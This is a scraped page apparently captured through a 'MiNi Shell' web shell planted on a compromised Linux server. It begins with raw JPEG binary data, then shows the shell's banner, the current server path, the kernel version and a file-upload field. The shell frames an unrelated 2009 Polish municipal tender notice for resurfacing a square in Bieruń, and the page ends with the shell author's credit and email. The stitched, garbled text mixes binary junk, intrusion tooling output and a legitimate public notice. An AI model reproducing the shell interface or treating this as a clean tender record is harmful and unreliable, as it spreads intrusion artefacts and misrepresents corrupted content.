JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090327/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090327/81066-N-2009.html

<p class="kh_header"><b>Bieruń: Remont nawierzchni placu wraz z budową zadaszenia przy budynku Urzędu Miejskiego   w Bieruniu Starym.</b><br>
<b>Numer ogłoszenia: 81066 - 2009; data zamieszczenia: 27.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 032 3242439, faks (032) 2164035; 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont nawierzchni placu wraz z budową zadaszenia przy budynku Urzędu Miejskiego   w Bieruniu Starym..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont nawierzchni placu wraz z budową zadaszenia  przy budynku
Urzędu  Miejskiego w Bieruniu Starym.
Zaleca się dokonać wizji lokalnej w terenie przed przystąpieniem do robót.

Zakres rzeczowy :
1.	Roboty geodezyjne.
2.	Rozbiórka starej nawierzchni.
3.	Wymiana nawierzchni istniejącego placu: 
- ułożenie podsypki cementowo-piaskowej
- nawierzchnia z kostki brukowej betonowej.
4.	Częściowa likwidacja donic z krzewami i ustawienie nowych.
5.	Wyburzenie istniejącego śmietnika.
6.	Wyburzenie części ogrodzenia przylegającego do sąsiadującego budynku.
7.	Budowa 2 zadaszeń o wymiarach 3,63 x 3,7 m opartych na słupach z cegły klinkierowej
z dachem o konstrukcji drewnianej, pokrytym blachodachówką.

       Powierzchnia placu: 446,99 m2.

Dokładny zakres prac określono w przedmiarze robót, który jest integralną częścią dokumentacji technicznej stanowiącej załącznik do niniejszej SIWZ.
Jeżeli w dokumentacji technicznej określone zostały maszyny, urządzenia lub materiały przy pomocy znaku towarowego, patentu lub pochodzenia, nie oznacza to, że nie można zastosować maszyn, urządzeń lub materiałów równoważnych, o podobnych, lecz nie gorszych parametrach. 
Na powyższe zmiany należy uzyskać akceptację Zamawiającego na etapie sporządzania oferty.
     
Zamawiający zastrzega, że zakres robót drogowych nie może zostać zlecony Podwykonawcom.
Zamawiający przewiduje udzielenie zamówień uzupełniających zgodnie z art.67 ust. 6 ustawy Pzp.
Zamawiający nie przewiduje zawarcia umowy ramowej, aukcji elektronicznej..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.26-9, 45.10.00.00-8, 45.11.12.00-0, 45.23.32.51-3, 45.11.13.00-1, 45.11.12.20-6, 45.26.23.00-4, 45.23.32.20-4, 45.26.25.22-6, 45.26.23.10-7, 45.26.11.00-5, 45.26.12.10-9, 45.26.12.11-6, 45.32.40.00-4, 77.31.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> wadium nie wymaga się<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W ubieganiu się o udzielenie zamówienia mogą uczestniczyć Wykonawcy, którzy:
1.	Spełniają wszystkie wymagania wynikające z oświadczeń, których listę przedstawiono                     w  punkcie Wymagane oświadczenia oraz inne wymagania formalne określone SIWZ i ustawą.
2.	Dysponują pracownikami z uprawnieniami budowlanymi w zakresie kierowania robotami drogowymi (uprawnienia drogowe) oraz konstrukcyjo-budowlanymi.
3.	Wykonali z należytą starannością w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania roboty remontowe lub inwestycyjne w zakresie budowy lub modernizacji dróg, chodników, parkingów lub placów o nawierzchni z kostki (dopuszcza się roboty drogowe                    wraz z robotami towarzyszącymi np. z kanalizacją deszczową, oświetleniem ulicznym) o łącznej wartości brutto min. 500 000,00 zł .
Przy ocenie spełnienia warunku Zamawiający będzie brał pod uwagę tylko te zadania, których     odbiór  dokonany został w ostatnich pięciu latach przed dniem wszczęcia postępowania.
Jeżeli okres działalności Wykonawcy jest krótszy niż określony w pkt 3, to należy potwierdzić wymagany w ww. punkcie warunek dla krótszego okresu działalności.
4.    Wykonają siłami własnymi zakres robót drogowych.
	
Ocena spełnienia warunków uczestnictwa w postępowaniu będzie dokonana wg zasady                                 spełnia-nie spełnia na podstawie przedłożonych w ofercie dokumentów i oświadczeń, w związku                  z wymaganiami określonymi w SIWZ i ustawie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Każdy Wykonawca przystępujący do postępowania złoży następujące oświadczenia:
1.	Oświadczenia z art. 22 ust. 1 oraz z art. 24 ust. 1, ust. 2 pkt. 1 ustawy, że:
a-	posiada uprawnienia do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b-	posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,
lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału        technicznego i osób zdolnych do wykonania zamówienia;
c-	znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d-	nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy.
2.	Oświadczenie, że po zapoznaniu się z SIWZ akceptuje ją bez zastrzeżeń.
3.	Oświadczenie, że będzie związany ofertą przez 30 dni od daty upływu terminu składania ofert,         a w przypadku wygrania przetargu zawrze umowę wg wzoru dołączonego do specyfikacji w ciągu 14 dni od daty otrzymania zawiadomienia o wyborze oferty.
4.	Oferta jest jawna w całości-części. Strony oferty od -do, stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisu o zwalczaniu nieuczciwej konkurencji i nie mogą być          ujawnione innym uczestnikom postępowania (z uwzględnieniem pkt. I. 4, podpunkty 7 i 8 SIWZ).
5.	Oświadczenie podmiotów występujących wspólnie (w przypadku ich uczestnictwa).
6.	Oświadczenie, że zamówienie wykona Wykonawca sam lub zakres dotyczący -wykona Wykonawca sam, natomiast  zakres dotyczący.: (wymienić części zamówienia)
zostanie powierzony Podwykonawcom.
7.	Oświadczenie o ujęciu w kosztach pośrednich kosztów nie będących kosztami z przedmiaru.
8.	Oświadczenie o udzielonej gwarancji na cały przedmiot zamówienia.   

Wszystkie oświadczenia muszą być złożone w oryginale i podpisane przez osobę (osoby) uprawnione do zaciągania zobowiązań w imieniu Wykonawcy, zgodnie z załączonym do oferty aktualnym wpisem do właściwych rejestrów (KRS) czy ewidencji działalności  gospodarczej lub odpowiednimi pełnomocnictwami. Pełnomocnictwa muszą zostać dołączone do oferty                  w formie oryginałów lub notarialnie poświadczonych kopii.


Lista wymaganych dokumentów
Od Wykonawców ubiegających się o przyznanie zamówienia wymagane jest, w celu potwierdzenia spełnienia warunków, o których mowa w art. 22 ust. 1 ustawy, przedstawienie wymienionych niżej dokumentów. Dokumenty te, zgodnie z obowiązującym w tym zakresie Rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006r. (Dz. U. Nr 87 z 2006, poz. 605 z późn. zm.), mogą być przedstawione w formie oryginału albo kopii poświadczonej za zgodność z oryginałem (zaleca się poświadczenie każdej zapisanej strony dokumentu) przez Wykonawcę, tzn. osobę (osoby) uprawnioną(e)  do podpisania oferty:

1.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia        do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.	Wykaz wykonanych z należytą starannością w okresie ostatnich pięciu lat przed dniem wszczęcia      postępowania  robót w zakresie budowy, remontów lub modernizacji dróg, chodników, parkingów      lub placów o nawierzchni z kostki o łącznej wartości brutto min. 500 000,00 zł .
Wykaz należy sporządzić wg wzoru tabeli stanowiącego załącznik do SIWZ.
3.	Dokumenty (np. referencje, protokoły odbioru końcowego) potwierdzające należytą staranność      wykonania robót wymienionych w wykazach dla potwierdzenia warunku określonego w punkcie 3 działu V SIWZ.
4.	Uprawnienia osób, które będą kierowały robotami drogowymi i konstrukcyjno-budowlanymi oraz aktualne zaświadczenia o przynależności do Okręgowej Izby Inżynierów Budownictwa                            (z dowodem opłaty składek  członkowskich na dzień otwarcia ofert, jeśli jego ważność upłynęła       w dniu otwarcia ofert).

Uwaga:
Jeżeli  Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w punkcie 1 Listy wymaganych dokumentów przedstawia odpowiednio:
1.  pkt 1 - dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce     zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,

Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem, przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa powyżej (w dziale VIII), zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
Termin ważności oświadczeń jest taki sam, jak dotyczący dokumentu, o którym mowa w punkcie                1 niniejszej uwagi..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - gwarancja - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.um.bierun.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski 43-150 Bieruń ul. Rynek 14.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.04.2009 godzina 12:00, miejsce: Urząd Miejski 43-150 Bieruń ul. Rynek 14 ( kancelaria- parter).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com